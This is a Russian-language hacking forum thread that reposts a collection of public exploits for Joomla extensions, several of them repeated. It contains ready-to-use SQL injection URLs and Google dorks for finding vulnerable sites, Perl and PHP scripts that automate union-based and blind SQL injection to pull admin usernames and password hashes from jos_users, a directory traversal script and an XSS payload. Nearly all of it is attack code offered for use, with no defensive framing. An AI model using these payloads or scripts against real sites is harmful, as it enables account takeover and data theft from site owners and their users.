[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[z00MAN]

Joomla Component simple_review 1.x SQL Injection Vulnerability

Код:

#Joomla com_simple_review Sql injection#
########################################
#[~] Author :  EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label Hippi Godlike Nitrous

#[!] Module_Name:  com_simple_review
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"com_simple_review"
########################################
 
www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--

 <name>simple_review</name>
 <creationDate>29/05/2006</creationDate>
 <author>Rowan Youngson</author>
 <copyright>This component in released under the Mozilla Public License Version 1.1</copyright>
 <authorEmail> 
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ] </authorEmail>

 <authorUrl>www.row1.info</authorUrl>
 <version>1.3.5</version>
 <description>Simple Review is a Review component for the Mambo CMS</description>

Joomla Component PAX Gallery 0.1 Blind SQL Injection Vulnerability

Код:

[■]  Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability
 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------<
 

[■] ExPL0iT:


|: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL] 


[■] D£M0: 

>Version:

|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5  [Ye$]
 
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]
 
 
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100
 
d8e423..ecc... ;-)
 
[■] Th4nKs::
 
\> Str0ke </ \> Securitycode Team </ \> StaKer </

Joomla Component com_na_content 1.0 Blind SQL Injection Vulnerability

Код:

Joomla Component com_na_content 1.0 Blind SQL Injection Vuln

Author: xoron

Exploit: /index.php?option=com_na_content&task=view&id=1 having 1=0
            /index.php?option=com_na_content&task=view&id=1 having 1=1
or

            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4
            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=5

!! You can use this for inj.
!! Thans for Ozan!

[z00MAN]

Joomla Component simple_review 1.x SQL Injection Vulnerability

Код:

#Joomla com_simple_review Sql injection#
########################################
#[~] Author :  EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label Hippi Godlike Nitrous

#[!] Module_Name:  com_simple_review
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"com_simple_review"
########################################
 
www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--

 <name>simple_review</name>
 <creationDate>29/05/2006</creationDate>
 <author>Rowan Youngson</author>
 <copyright>This component in released under the Mozilla Public License Version 1.1</copyright>
 <authorEmail> 
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ] </authorEmail>

 <authorUrl>www.row1.info</authorUrl>
 <version>1.3.5</version>
 <description>Simple Review is a Review component for the Mambo CMS</description>

Joomla com_na_newsdescription (newsid) SQL Injection Exploit

Код:

#!/usr/bin/perl -w
 
 
#Joomla com_na_newsdescription Sql injection#
########################################
#[~] Author :  EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label TURK Godlike Nitrous
 
#[!] Module_Name:  com_na_newsdescription
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"com_na_newsdescription"
########################################
 
 
system("color FF0000");
system("Nohacking");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|                 Turkish Securtiy Team                      |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_na_newsdescription(show&groupId=)Remote SQL Injection Vuln|\n\n";
print "\t\t|   Coded by: EcHoLL     www.warezturk.org               |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
 
use LWP::UserAgent;
 
print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
 chomp(my $target=<STDIN>);
 
$column_name="concat(username,0x3a,password)";
$table_name="jos_users";
 
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
 
$host = $target .   "/index.php?option=com_na_newsdescription&task=show&groupId=17377_19&newsid=85790+AND+1=2+UNION+SELECT+".$column_name.",1,2,3,4,5,6,7+from/**/".$table_name."--";< BR>$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
  print "\n[+] Admin Hash : $1\n\n";
  print "#   Tebrikler Exploit Calisti!  #\n\n";
}
else{print "\n[-] Exploit Bulunamadı...\n";
}

Joomla com_phocadocumentation (id) Remote SQL Injection Exploit

Код:

#!/usr/bin/perl -w


#Joomla com_phocadocumentation Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label TURK Godlike Nitrous

#[!] Module_Name: com_phocadocumentation
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_phocadocumentation"
########################################


system("color FF0000");
system("Nohacking");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t| Turkish Securtiy Team |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_phocadocumentation(section&id=)Remote SQL Injection Vuln|\n\n";
print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\n";
print "\t\t-------------------------------------------------------------\n\n";

use LWP::UserAgent;

print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);

$column_name="concat(username,0x3a,password)";
$table_name="jos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "/index.php?option=com_phocadocumentation&view=section&id=1+AND+1=2+UNION+SELECT+".$column_name.",1,2+from/**/".$table_name."--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Tebrikler Exploit Calisti! #\n\n";
}
else{print "\n[-] Exploit Bulunamadı...\n";
}

Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability

Код:

<?php
/*
 Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability
 
 discovered by: irk4z[at]yahoo.pl
 greets: all friends ;) 
*/

echo "* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln\n";
echo "* discovered by: irk4z[at]yahoo.pl\n";
echo "*\n";
echo "* greets: all friends ;) enjoy!\n";
echo "*------------------------------------------------------------------*\n";

$host = $argv[1];
$path = $argv[2];
$folder = $argv[3];

if (empty($host) || empty($path)) {
	echo "usage: php {$argv[0]} <host> <path> [<folder>]\n";
	echo "       php {$argv[0]} example.org /joomla\n";
	echo "       php {$argv[0]} example.org /joomla ../../\n";
	exit;
}

echo "http://" . $host . $path . "/images/stories/\n\n";

if ( empty($folder) ){
	$lev = "./";
	for( $i = 0; $i <= 7; $i++ ) {
		echo browseFolder($host, $path, $lev);
		$lev .= "../";
	}
} else {
	echo browseFolder($host, $path, $folder);
}

function browseFolder($host, $path, $folder){
	
	$packet = "GET {$path}/plugins/editors/xstandard/attachmentlibrary.php HTTP/1.1\r\n";
	$packet .= "Host: {$host}\r\n";
	$packet .= "X_CMS_LIBRARY_PATH: {$folder}\r\n";
	$packet .= "Connection: Close\r\n\r\n";

	$o = @fsockopen($host, 80);
	if(!$o){
		echo "\n[x] No response...\n";
		die;
	}
	
	fputs($o, $packet);
	while (!feof($o)) $data .= fread($o, 1024);
	fclose($o);
	
	$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
	if ( !empty($_404) ){
		echo "\n[x] 404 Not Found... Maybe wrong path? \n";
		die;
	}
	
	//folders
	preg_match_all("/<baseURL>([^<]+)<\/baseURL>/", $data, $matches);
	//files
	preg_match_all("/<value>([^<]+\.[^<]{3,4})<\/value>/", $data, $matches2);
	
	$matches = array_merge( $matches[1], $matches2[1] );
	
	if ( empty($matches) ){
		$ret = "$folder [x] Failed...\n";
	} else {
		$ret = '';
		foreach( $matches as $tmp){
			$ret .= str_replace("images/stories/", '', str_replace("/./", "/", str_replace("//", "/", urldecode($tmp) ) ) ) . "\n";
		}
	}
	
	return ($ret);
}

?>

[z00MAN]

Joomla Component com_gigcal(gigcal_gigs_id) SQL-injection

Код:

http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*

[z00MAN]

Joomla

Joomla Component Fantasytournament SQL Injection Vulnerabilities

Код:

#############################################################################
#							                    #
# Joomla Component Fantasytournament Multiple SQL Injection Vulnerabilities #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:     "Joomla"
[~] Component:      "Fantasytournament (com_fantasytournament)"
[~] Version:        "2009.1.5" 
[~] Date:           "01/01/2009"
[~] Author:         "Adrian Gray"
[~] Author E-mail:  "
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ].uk"
[~] Author URL:     "www.graymoose.com"
[~] Component info: "http://extensions.joomla.org/extensions/sports-&-games/sports/1604/details"

########################################

[~] Exploit 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=[SQL]
[~] Example 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--

########################################

[~] Exploit 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=[SQL]
[~] Example 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--

########################################

[~] Exploit 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=[SQL]
[~] Example 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

Joomla Component Camelcitydb2 2.2 SQL Injection Vulnerabilities

Код:

#############################################################################
#							                    #
#         Joomla Component Camelcitydb2 SQL Injection Vulnerability         #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:     "Joomla"
[~] Component:      "Camelcitydb2 (com_camelcitydb2)"
[~] Version:        "2.2" 
[~] Date:           "November 2008"
[~] Author:         "Noel Hunter"
[~] Author E-mail:  "
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]"
[~] Author URL:     "www.camelcity.com"
[~] Component info: "http://extensions.joomla.org/extensions/core-enhancements/data-reports/2730/details"

########################################

[~] Exploit /index.php?option=com_camelcitydb2&id=[SQL]&view=detail&Itemid=15
[~] Example /index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

[z00MAN]

Joomla com_Eventing 1.6.x Blind SQL Injection Exploit

PHP код:

<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
#                Joomla com_Eventing Blind SQL Injection Exploit
#
#                             ===  Cyb3R-1st  ===
#                           
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]
#                      == Writing by Stack - thx m8 - ==
#
# usage : php file.php "http://site.me/index.php?option=com_eventing&catid=1"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
} 
?>

Joomla Component RD-Autos 1.5.2 (id) SQL Injection Vulnerability

Код:

#############################################################################
#							                    #
#           Joomla Component RDAutos SQL Injection Vulnerability            #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de 
[~]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-

########################################

[~] ScriptName:     "Joomla"
[~] Component:      "RDAutos (com_rdautos)"
[~] Version:        "1.5.5 Stable" 
[~] Date:           "29/09/2008"
[~] Author:         "Robert Dam"
[~] Author E-mail:  "
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]"
[~] Author URL:     "www.rd-media.org"

########################################

[~] Exploit /index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

[z00MAN]

Joomla Component Gigcal 1.x (id) SQL Injection Vulnerability

Exploit :

Код:

 /index.php?option=com_gigcal&Itemid=78&id={SQL}

Example :

Код:

/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*

Joomla com_pccookbook (recipe_id) Blind SQL Injection Exploit

Код:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                        \n";                                                             
  print "  #########################################################################\n";
  print "  #   \n";
  print "  #            Joomla com_pccookbook Blind sql injection exploit \n";
  print "  #   \n";
  print "  #                              Cyb3R-1sT \n";
  print "  #                       cyb3r-1st[at]hotmail.com \n";
  print "  #   \n";
  print "  #                Usage:perl file.pl host path <options> \n";
  print "  #            example: perl file.pl www.host.com /joomla/ -a 7 \n";
  print "  #   \n";
  print "  #                           Options:  -a id \n";
  print "  #   \n";
  print "  #########################################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"a"})
{
  $aid = $options{"a"};
}

syswrite(STDOUT, "[~] Password: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $aid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $aid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $aid   = shift;
  my $i     = shift;
  my $h     = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Ingredients";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2009-01-19]

Joomla Component com_news SQL Injection Vulnerability

Exploit:

Код:

http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--

Joomla com_waticketsystem Blind SQL Injection Exploit

PHP код:

<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
#                Joomla com_waticketsystem Blind SQL Injection Exploit
#
#                             ===  Cyb3R-1st  ===
#                           
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]
#                            == inject0r5 t3am ==
#
#    usegae : php file.php "http://site/index.php?option=com_waticketsystem&act=category&catid=1"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
} 
?>

# milw0rm.com [2009-01-19]

[z00MAN]

Joomla Com BazaarBuilder Shopping Cart v.5.0 SQL Injection Exploit

Код:

#!/usr/bin/perl -w
#Joomla component: BazaarBuilder Shopping Cart Software v.5.0 sql injection#
########################################
#[+] Author : XaDoS
#[+] Contact me: www.securitycode.it // xados [at] hotmail [dot] it
#[+] Greetz : Plucky - Str0ke - GsC - boom3rang - My girl ;-)
#[+] Module_Name: BazaarBuilder Ecommerce Shopping Cart Software v. 5.0
#[+] Script_Name: Joomla
#[+] Dork: find it XD
########################################
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|                  ---||> X:A:D:O:S <||---                    |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_prod <= Remote SQL Injection Vuln|\n\n";
print "\t\t| XaDoS ~ www.securitycode.it |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
use LWP::UserAgent;
print "\nEnter the url of vuln site[http://wwww.example.com]: ";
chomp(my $target=<STDIN>);
$column_name="concat(username,char(58),password)";
$table_name="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_prod&task=products&cid=-9999%20union%20all%20select%201,2,3,".$column_name.",5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from/**/".$table_name."+/*+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "||> Exploit done! ;-) <||\n\n";
}
else{print "\n||> Exploit failed! :-( <||\n";
}

Joomla com_pcchess (game_id) Blind SQL Injection Exploit

Код:

<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
#                Joomla com_pcchess (game_id) Blind SQL Injection Exploit
#
#                             ===  Cyb3R-1st  ===
#                           
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]
#                            == inject0r5 t3am ==
#
#     usegae : php file.php "http://site/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
} 
?>

Joomla Component beamospetition 1.0.12 SQL Injection / XSS

Код:

Joomla component beamospetition 1.0.12 Sql Injection / Xss

Author : vds_s

Dork : "Powered by beamospetition 1.0.12"

Dl : http://joomlacode.org/gf/project/beamospetition/

Xss : http://[site]/?option=com_beamospetition&func=sign&pet='><script>alert('Xss')</script>

Sql Injection : http://[site]/?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/*

[mihas]

ето конешно забавно) но ето все уже настолько андергроунд) имхо нигде таких версий ненайдете...